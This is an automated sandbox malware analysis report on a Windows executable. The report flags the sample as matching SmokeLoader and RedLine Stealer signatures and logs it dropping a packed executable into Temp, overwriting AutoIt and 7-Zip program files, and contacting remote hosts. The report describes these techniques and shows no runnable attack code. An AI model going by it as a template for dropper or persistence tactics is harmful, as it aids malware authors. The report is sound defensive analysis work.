Source: current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707811358.0000000000894000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707606358.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707606358.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/ddos/glossary/malware/
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: SciTE.exe.1.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_c9d56119-2

System Summary

Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: current[1].exe Static PE information: section name: ESu,
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: jJEAWO.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00462440 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00462440
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0042E700 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0042E700
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00460870 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00460870
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045E927 NtOpenSection, 0_2_0045E927
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00462990 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00462990
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045EAE9 NtMapViewOfSection, 0_2_0045EAE9
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00460A90 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00460A90
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045EFF5 NtClose, 0_2_0045EFF5
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00451140 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00451140
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045A160 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0045A160
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0044E120 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0044E120
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045D1D0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0045D1D0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004641E0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004641E0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00439260 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00439260
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004632A0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004632A0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00451370 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00451370
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045D400 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0045D400
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004394C0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004394C0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004634F0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004634F0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004434B0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004434B0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045C550 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0045C550
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00437530 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00437530
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004645E0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004645E0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004396E0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004396E0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004626F0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004626F0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045C790 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0045C790
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00464800 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00464800
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004638F0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_004638F0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00439910 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00439910
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0042E920 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0042E920
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045CA90 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0045CA90
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00463B20 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00463B20
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00462BF0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00462BF0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045CD20 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0045CD20
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00462F00 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00462F00
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045CF80 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0045CF80
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00463FA0 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00463FA0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A3167 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A3167
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079D1E7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0079D1E7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A4207 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A4207
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079A3C7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0079A3C7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007913A7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007913A7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0078E387 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0078E387
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A4447 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A4447
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079D437 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0079D437
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007794C7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007794C7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A3507 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A3507
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007915D7 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007915D7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079D667 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0079D667
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A26A7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A26A7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A3757 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A3757
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00779727 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00779727
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00783717 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00783717
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079C7B7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0079C7B7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00777797 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00777797
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A4847 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A4847
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0076E967 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0076E967
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A2957 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A2957
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00779947 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00779947
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079C9F7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0079C9F7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A4A67 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A4A67
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A0AD7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A0AD7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00779B77 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_00779B77
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A3B57 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A3B57
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A2BF7 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A2BF7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0076EB87 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0076EB87
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A0CF7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A0CF7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079CCF7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0079CCF7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A3D87 NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A3D87
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A2E57 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_007A2E57
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079CF87 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory, 0_2_0079CF87
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E96D00 1_2_00E96D00
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\jJEAWO.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
Source: C:\Users\user\Desktop\current[1].exe Code function: String function: 0041D6B0 appears 39 times
Source: C:\Users\user\Desktop\current[1].exe Code function: String function: 0075D917 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1624
Source: MyProg.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: current[1].exe, 00000000.00000000.1675365192.000000000047F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWonder4 vs current[1].exe
Source: current[1].exe, 00000000.00000003.1699663206.00000000008FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWonder4 vs current[1].exe
Source: current[1].exe Binary or memory string: OriginalFilenameWonder4 vs current[1].exe
Source: current[1].exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: jJEAWO.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: current[1].exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jJEAWO.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jJEAWO.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@6/15@2/2
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E9119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 1_2_00E9119F
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0082F056 CreateToolhelp32Snapshot,Module32First, 0_2_0082F056
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7452
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7436
Source: C:\Users\user\Desktop\current[1].exe File created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe
Source: C:\Users\user\Desktop\current[1].exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\current[1].exe File read: C:\Users\user\Desktop\current[1].exe
Source: unknown Process created: C:\Users\user\Desktop\current[1].exe "C:\Users\user\Desktop\current[1].exe"
Source: C:\Users\user\Desktop\current[1].exe Process created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe C:\Users\user\AppData\Local\Temp\jJEAWO.exe
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1624
Source: C:\Users\user\Desktop\current[1].exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1504
Source: C:\Users\user\Desktop\current[1].exe Process created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe C:\Users\user\AppData\Local\Temp\jJEAWO.exe Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\current[1].exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: current[1].exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source: Binary string: .C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe
Source: Binary string: C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe

Data Obfuscation

Source: C:\Users\user\Desktop\current[1].exe Unpacked PE file: 0.2.current[1].exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;ESu,:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Unpacked PE file: 1.2.jJEAWO.exe.e90000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\Desktop\current[1].exe Unpacked PE file: 0.2.current[1].exe.400000.0.unpack
Source: initial sample Static PE information: section where entry point is pointing to: ESu,
Source: current[1].exe Static PE information: section name: ESu,
Source: jJEAWO.exe.0.dr Static PE information: section name: .aspack
Source: jJEAWO.exe.0.dr Static PE information: section name: .adata
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr Static PE information: section name: PELIB
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr Static PE information: section name: u
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0046AEDC push edi; iretd 0_2_0046AEDD
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00469FC4 push edx; ret 0_2_00469FC5
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00830B3E push edx; ret 0_2_00830B3F
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E91638 push dword ptr [00E93084h]; ret 1_2_00E9170E
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E9600A push ebp; ret 1_2_00E9600D
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E92D9B push ecx; ret 1_2_00E92DAB
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E96014 push 00E914E1h; ret 1_2_00E96425
Source: current[1].exe Static PE information: section name: .text entropy: 7.864241341045099
Source: current[1].exe Static PE information: section name: ESu, entropy: 6.934721013700985
Source: jJEAWO.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ entropy: 6.934597182758975
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR entropy: 6.935322309363604
Source: SciTE.exe.1.dr Static PE information: section name: u entropy: 6.934363744578973

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe File created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 799
Source: C:\Users\user\Desktop\current[1].exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\current[1].exe TID: 7568 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E91718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E91754h 1_2_00E91718
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00E929E2
